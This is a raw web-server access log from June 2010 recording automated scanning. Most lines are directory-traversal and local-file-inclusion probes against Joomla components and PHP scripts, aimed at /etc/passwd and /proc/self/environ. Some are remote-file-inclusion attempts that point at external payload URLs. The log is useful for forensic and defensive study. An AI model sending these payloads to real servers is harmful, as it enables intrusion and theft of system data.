174.121.64.231 - - [07/Jun/2010:00:04:26 -0500] "GET //components/com_calendar.php?absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.810"
174.121.64.231 - - [07/Jun/2010:00:04:26 -0500] "GET /logs//components/com_calendar.php?absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 317 "-""libwww-perl/5.810"
200.135.228.230 - - [07/Jun/2010:00:04:35 -0500] "GET /logs/access_log.1273363200//emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.79"
200.135.228.230 - - [07/Jun/2010:00:04:36 -0500] "GET //emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.79"
200.135.228.230 - - [07/Jun/2010:00:04:36 -0500] "GET /logs//emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.79"
188.72.70.56 - - [07/Jun/2010:00:05:48 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:05:49 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:05:49 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
208.100.59.16 - - [07/Jun/2010:00:06:07 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
208.100.59.16 - - [07/Jun/2010:00:06:07 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.100.59.16 - - [07/Jun/2010:00:06:12 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
208.100.59.16 - - [07/Jun/2010:00:06:12 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
93.89.215.70 - - [07/Jun/2010:00:06:24 -0500] "GET /logs/access_log.1273363200/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
188.72.70.56 - - [07/Jun/2010:00:06:27 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:06:27 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:06:27 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:00:06:53 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
174.121.20.138 - - [07/Jun/2010:00:06:56 -0500] "GET /logs/access_log.1273363200//emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.810"
174.121.20.138 - - [07/Jun/2010:00:06:59 -0500] "GET //emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
174.121.20.138 - - [07/Jun/2010:00:07:02 -0500] "GET /logs//emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
209.188.90.44 - - [07/Jun/2010:00:07:09 -0500] "GET /logs/access_log.1273363200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
200.135.228.230 - - [07/Jun/2010:00:08:01 -0500] "GET /logs/access_log.1274313600//emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.79"
209.188.90.44 - - [07/Jun/2010:00:08:57 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:00:08:57 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:00:12:33 -0500] "GET /logs/access_log.1273017600/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:00:12:33 -0500] "GET /*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:00:12:34 -0500] "GET /logs/*.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
188.72.70.56 - - [07/Jun/2010:00:12:54 -0500] "GET /logs/access_log.1274313600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:13:24 -0500] "GET /logs/access_log.1274313600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:00:14:10 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
188.72.70.56 - - [07/Jun/2010:00:14:23 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:14:24 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:14:24 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:14:33 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:14:33 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:14:33 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:14:38 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:14:45 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:17:35 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:17:35 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:17:35 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
212.241.179.30 - - [07/Jun/2010:00:18:24 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:18:24 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:18:24 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:18:25 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.194.110 - - [07/Jun/2010:00:18:55 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.110 - - [07/Jun/2010:00:18:56 -0500] "GET /artwork/motto-chair-stitch2.jpg HTTP/1.1" 200 30365 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
212.241.179.30 - - [07/Jun/2010:00:19:23 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:19:23 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
188.72.70.56 - - [07/Jun/2010:00:19:43 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:19:44 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:00:19:44 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
74.53.154.162 - - [07/Jun/2010:00:20:17 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:00:20:17 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
212.241.179.30 - - [07/Jun/2010:00:20:29 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:20:29 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:20:29 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:20:37 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:20:37 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:20:37 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
74.53.154.162 - - [07/Jun/2010:00:20:45 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
94.23.0.30 - - [07/Jun/2010:00:21:27 -0500] "GET /logs//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.803"
94.23.0.30 - - [07/Jun/2010:00:21:30 -0500] "GET //components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.803"
94.23.0.30 - - [07/Jun/2010:00:23:57 -0500] "GET /logs/access_log.1273363200//webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 364 "-""libwww-perl/5.803"
94.23.0.30 - - [07/Jun/2010:00:24:00 -0500] "GET //webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 337 "-""libwww-perl/5.803"
94.23.0.30 - - [07/Jun/2010:00:24:03 -0500] "GET /logs//webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 342 "-""libwww-perl/5.803"
205.186.184.23 - - [07/Jun/2010:00:24:25 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:00:25:20 -0500] "GET /logs/access_log.1273363200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.241.179.30 - - [07/Jun/2010:00:27:18 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:27:18 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:27:19 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:27:22 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:27:23 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
212.241.179.30 - - [07/Jun/2010:00:27:23 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.0.30 - - [07/Jun/2010:00:27:40 -0500] "GET /logs/access_log.1273363200//webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 364 "-""libwww-perl/5.803"
94.23.0.30 - - [07/Jun/2010:00:27:43 -0500] "GET //webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 337 "-""libwww-perl/5.803"
94.23.0.30 - - [07/Jun/2010:00:27:46 -0500] "GET /logs//webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 342 "-""libwww-perl/5.803"
74.53.154.162 - - [07/Jun/2010:00:28:12 -0500] "GET //index.php?option=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.53.154.162 - - [07/Jun/2010:00:28:12 -0500] "GET /logs//index.php?option=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.53.154.162 - - [07/Jun/2010:00:28:12 -0500] "GET /logs/access_log.1271635200//index.php?option=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.53.154.162 - - [07/Jun/2010:00:28:14 -0500] "GET /logs/access_log.1270598400//index.php?option=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.23.60.216 - - [07/Jun/2010:00:28:35 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
209.200.244.57 - - [07/Jun/2010:00:28:41 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.53.154.162 - - [07/Jun/2010:00:28:49 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:00:28:49 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:00:28:49 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:00:29:21 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:00:29:22 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:00:29:22 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.195.112.180 - - [07/Jun/2010:00:29:54 -0500] "GET /logs/access_log.1195430400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.154.162 - - [07/Jun/2010:00:31:21 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:00:31:43 -0500] "GET //index.php?option=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.53.154.162 - - [07/Jun/2010:00:31:44 -0500] "GET /logs/access_log.1271635200//index.php?option=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.53.154.162 - - [07/Jun/2010:00:31:45 -0500] "GET /logs//index.php?option=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.53.154.162 - - [07/Jun/2010:00:31:45 -0500] "GET /logs/access_log.1270598400//index.php?option=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
94.23.0.30 - - [07/Jun/2010:00:33:09 -0500] "GET //components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""libwww-perl/5.803"
174.121.20.138 - - [07/Jun/2010:00:35:18 -0500] "GET /logs/access_log.1274313600//emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.810"
209.188.90.44 - - [07/Jun/2010:00:36:42 -0500] "GET /logs/access_log.1274227200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:00:36:42 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:00:36:42 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
195.9.14.148 - - [07/Jun/2010:00:37:32 -0500] "GET /logs/access_log.1238803200%20%20//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:37:32 -0500] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:37:32 -0500] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:37:32 -0500] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:37:32 -0500] "GET /logs/access_log.1238803200%20%20//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:37:33 -0500] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:37:36 -0500] "GET /logs/access_log.1238803200%20%20//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:37:36 -0500] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:37:36 -0500] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:38:00 -0500] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:38:00 -0500] "GET /logs/access_log.1238803200//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:38:00 -0500] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:38:02 -0500] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:38:02 -0500] "GET /logs/access_log.1238803200//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:38:02 -0500] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:38:03 -0500] "GET /logs//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:38:03 -0500] "GET /logs/access_log.1238803200//FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
195.9.14.148 - - [07/Jun/2010:00:38:03 -0500] "GET //FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
91.190.243.10 - - [07/Jun/2010:00:42:28 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:00:42:28 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:00:42:34 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:00:42:34 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
207.46.195.231 - - [07/Jun/2010:00:43:06 -0500] "GET /logs/access_log.1258416000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.190.243.10 - - [07/Jun/2010:00:43:12 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:00:43:12 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:00:43:24 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:00:43:25 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
